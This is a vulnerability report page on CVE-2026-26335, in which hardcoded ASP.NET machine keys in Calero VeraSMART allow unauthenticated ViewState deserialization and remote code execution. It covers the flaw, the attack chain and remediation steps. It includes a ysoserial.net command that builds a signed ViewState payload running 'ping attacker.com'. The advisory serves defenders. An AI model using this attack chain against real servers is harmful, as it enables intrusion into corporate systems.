CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



CVE-2026-26335

Skeleton Keys in the Expense Report: The Calero VeraSMART RCE

Alon Barad
Alon Barad
Software Engineer

Feb 17, 2026·6 min read·31 visits

Executive Summary (TL;DR)

Calero VeraSMART < 2022 R1 uses hardcoded ASP.NET machine keys. Attackers can use these static keys to sign malicious ViewState payloads, triggering server-side deserialization and arbitrary code execution.

A critical failure in cryptographic key management within Calero VeraSMART allows unauthenticated attackers to achieve Remote Code Execution (RCE) via ASP.NET ViewState deserialization. By shipping identical `machineKey` values in the `web.config` across all installations, the vendor essentially provided a master key to every instance of the software.

The Hook: Who Pays the Bill?

In the exciting world of Telecom Expense Management (TEM), software like Calero VeraSMART is the boring, reliable workhorse that tracks phone bills and data usage for large enterprises. It lives deep in the corporate intranet, trusted with sensitive financial data and integration points into the wider network. It's the kind of software nobody looks at twice—until it starts popping shells.

CVE-2026-26335 is not a subtle bug. It isn't a complex heap feng-shui maneuver or a race condition that requires nanosecond precision. It is the digital equivalent of a bank vault manufacturer setting the combination for every single vault they sell to 1-2-3-4.

Because of this oversight, an unauthenticated attacker can turn this expense management platform into a beachhead for a full-scale network compromise. If you can reach the login page, you own the server. No credentials required, no phishing needed. Just a serialized payload and a dream.

The Flaw: ASP.NET's Kryptonite

To understand this vulnerability, you need a quick refresher on ASP.NET ViewState. ViewState is that massive, ugly Base64 string you see in the HTML source of older .NET applications (<input type="hidden" name="__VIEWSTATE" ... />). It's how the server remembers the state of the UI (like what you typed into a form) between stateless HTTP requests.

Because ViewState is stored on the client side (the browser), it must be protected. If a user can tamper with it, they can modify server-side variables. To prevent this, ASP.NET uses a Machine Key (machineKey) to sign (HMAC) and optionally encrypt the data. When the server receives the ViewState back, it checks the signature using its key. If the signature matches, the server trusts the data and—crucially—deserializes it.

The flaw in VeraSMART is almost impressive in its simplicity: the developers hard-coded the validationKey and decryptionKey directly into the web.config file distributed with the installer.

Instead of generating unique keys during installation (the standard practice), every instance of VeraSMART < 2022 R1 shares the exact same cryptographic DNA. If you know the key for one, you know the key for them all. And since the installer is public, everyone knows the key.

The Code: The Smoking Gun

Normally, a secure web.config lets the IIS server handle key generation automatically, or an admin generates them once. Here is what the vulnerable configuration looks like. This block effectively disables the security mechanism by making the secret public knowledge.

Vulnerable web.config

<configuration>
  <system.web>
    <!-- 
      Look at this beauty. A static, hard-coded key 
      shared across the entire customer base. 
    -->
    <machineKey 
      validationKey="F3690E7A31...[STATIC_VALUE]...9A2B" 
      decryptionKey="4D5A2F...[STATIC_VALUE]...890C" 
      validation="SHA1" 
      decryption="AES" 
    />
  </system.web>
</configuration>

The Fix

The patch doesn't just change the numbers; it changes the methodology. In versions 2022 R1 and later, the vendor removed these static entries, allowing the .NET framework to default to AutoGenerate,IsolateApps. This ensures that every server creates its own unique ephemeral keys, or forces the administrator to generate them manually during setup.

> [!NOTE] > Deserialization vulnerabilities are often called the "Bug of a Decade" because they are so devastating. When the server deserializes the ViewState, it reconstructs objects in memory. If the attacker controls the object type (via the Gadget Chain), they can force the application to execute code during the reconstruction process, often before the application logic even runs.

The Exploit: Forging the Golden Ticket

Exploiting this is trivial for anyone familiar with the .NET attack surface. Since we have the validationKey and decryptionKey (extracted from the vendor's installer or a leaked config), we become the Certificate Authority of this application. We can sign anything we want, and the server will trust it.

Here is the attack chain:

  1. Preparation: The attacker extracts the keys from the vulnerable software version.
  2. Payload Generation: Using a tool like ysoserial.net, the attacker generates a serialized object payload. The target is likely using the ObjectStateFormatter (default for ViewState).
  3. Weaponization: The attacker wraps the payload in a valid ViewState structure, encrypts it, and signs it using the stolen keys.
# Conceptual attack command using ysoserial.net
.\ysoserial.exe -p ViewState -g TypeConfuseDelegate \
  -c "cmd.exe /c ping attacker.com" \
  --validkey="F3690E7A..." \
  --decrypkey="4D5A2F..." \
  --generator="[TargetPageHexID]"
  1. Delivery: The attacker sends a POST request to the VeraSMART login page (/Login.aspx or similar), replacing the legitimate __VIEWSTATE parameter with their malicious blob.
  2. Detonation: IIS receives the request. It verifies the signature (Pass). It decrypts the blob (Pass). It deserializes the object... and immediately executes the embedded command.

The result is code execution as NT AUTHORITY\NETWORK SERVICE or SYSTEM, depending on the IIS configuration. From there, it's game over.

The Impact: Total System Compromise

The impact here cannot be overstated. We are talking about unauthenticated Remote Code Execution on a server that is likely joined to a corporate domain.

  • Data Exfiltration: VeraSMART holds call records, billing data, and potentially integration credentials for other financial systems.
  • Lateral Movement: IIS servers are excellent jump boxes. They often have broad network visibility. An attacker can dump credentials from memory (LSASS) or use the compromised host to tunnel traffic into the internal network.
  • Ransomware: With system-level access, deploying a cryptolocker binary is a one-line command.

The "Exploit Intelligence" indicates this was seen in the wild in March 2025. This isn't theoretical; threat actors are actively scanning for these exposed web.config signatures or blindly throwing ViewState payloads at VeraSMART instances.

The Fix: Rotate or Die

The official remediation is to upgrade to Calero VeraSMART 2022 R1 or later. However, if you are stuck in change-management purgatory, you can apply a manual fix immediately.

Manual Remediation Strategy

You must replace the static keys in web.config with unique, cryptographically strong values. You can generate these using a simple PowerShell script:

function Generate-Key($length) {
    $bytes = New-Object byte[] $length
    (New-Object System.Security.Cryptography.RNGCryptoServiceProvider).GetBytes($bytes)
    return [BitConverter]::ToString($bytes).Replace("-", "")
}
 
Write-Host "ValidationKey: $(Generate-Key 64)"
Write-Host "DecryptionKey: $(Generate-Key 32)"

Paste the new keys into your web.config. Warning: This will invalidate any existing sessions or ViewStates, so do this during a maintenance window. Users will be logged out.

Finally, ensure your web.config is not accessible via a browser request (IIS typically blocks this by default, but misconfigurations happen).

Official Patches

CaleroAdvisory detailing the fix in version 2022 R1.

Technical Appendix

CVSS Score
9.3/ 10
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
EPSS Probability
0.08%
Top 76% most exploited

Affected Systems

Calero VeraSMART < 2022 R1

Affected Versions Detail

Product
Affected Versions
Fixed Version
VeraSMART
Calero
< 2022 R12022 R1
AttributeDetail
CWE IDCWE-321 (Hard-coded Cryptographic Key)
CVSS 4.09.3 (Critical)
Attack VectorNetwork (Remote)
ImpactRemote Code Execution (RCE)
Exploit StatusPoC Available / Active in Wild
EPSS Score0.08% (Rising)

MITRE ATT&CK Mapping

T1552.001Credentials In Files
Credential Access
T1505.003Web Shell
Persistence
T1190Exploit Public-Facing Application
Initial Access
CWE-321
Use of Hard-coded Cryptographic Key

The use of a hard-coded cryptographic key significantly increases the possibility that encrypted data may be recovered or that signatures may be forged.

Known Exploits & Detection

GitHubPython-based PoC generating signed ViewState payloads using static keys.

Vulnerability Timeline

Exploitation observed in the wild
2025-03-01
Public Disclosure & Advisory Published
2026-02-13

References & Sources

  • [1]NVD Entry
  • [2]OffSeq Threat Radar

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.

More Reports

•about 6 hours ago•CVE-2026-54269
5.3

CVE-2026-54269: Runtime Property Shadowing and Denial of Service in protobufjs

A property shadowing vulnerability exists in protobufjs where schema-derived names can collide with and overwrite runtime-critical internal helper properties. This issue leads to uncaught runtime exceptions and crash-based Denial of Service.

Alon Barad
Alon Barad
3 views•6 min read
•1 day ago•CVE-2025-6965
7.7

CVE-2025-6965: Remote Code Execution via Integer Truncation in SQLite Aggregate Parser

An integer truncation vulnerability (CWE-197) exists in SQLite before version 3.50.2 during the processing of aggregate queries with more than 32,767 distinct column references. This causes an internal 32-bit counter to truncate to a signed 16-bit integer, producing negative values that cause out-of-bounds heap operations in release builds.

Amit Schendel
Amit Schendel
13 views•6 min read
•2 days ago•CVE-2026-47291
9.8

CVE-2026-47291: Remote Code Execution in Windows HTTP.sys Kernel Driver

An integer overflow vulnerability in the Windows kernel-mode HTTP driver (HTTP.sys) allows an unauthenticated remote attacker to execute arbitrary code with kernel privileges or cause a Denial of Service via a specially crafted sequence of HTTP request headers.

Amit Schendel
Amit Schendel
23 views•8 min read
•2 days ago•CVE-2026-11822
7.8

CVE-2026-11822: Memory Corruption and Buffer Overflow in SQLite FTS5 Extension

A memory corruption vulnerability exists in the FTS5 (Full-Text Search 5) extension of SQLite prior to version 3.53.2. An attacker can construct a malicious database file containing corrupt FTS5 page data. Querying this database triggers out-of-bounds reads and heap-based buffer overflows, potentially causing a crash or arbitrary code execution.

Amit Schendel
Amit Schendel
7 views•5 min read
•2 days ago•CVE-2026-56350
6.3

CVE-2026-56350: SSO Enforcement Bypass in n8n via API Parameter Pollution / Mass Assignment

A mass assignment vulnerability (CWE-915) in n8n's self-service settings API endpoint (PATCH /me/settings) allows authenticated Single Sign-On (SSO) users to disable SSO enforcement for their accounts by injecting administrative parameters. This bypasses organizational identity provider controls and multi-factor authentication (MFA).

Amit Schendel
Amit Schendel
9 views•6 min read
•6 days ago•CVE-2026-55699
6.5

CVE-2026-55699: Arbitrary Directory Deletion via Path Traversal in pnpm globalBinDir Resolver

CVE-2026-55699 (also identified as GHSA-4gxm-v5v7-fqc4) is a critical path traversal and arbitrary directory deletion vulnerability in the pnpm package manager. The issue exists because the manifest validation process fails to prevent relative path segments within the package 'bin' keys. When a malicious package containing structured path traversal markers is globally installed and later manipulated, pnpm resolves the target paths through path.join() and passes the resolved paths to a recursive deletion function, resulting in arbitrary directory removal.

Amit Schendel
Amit Schendel
23 views•6 min read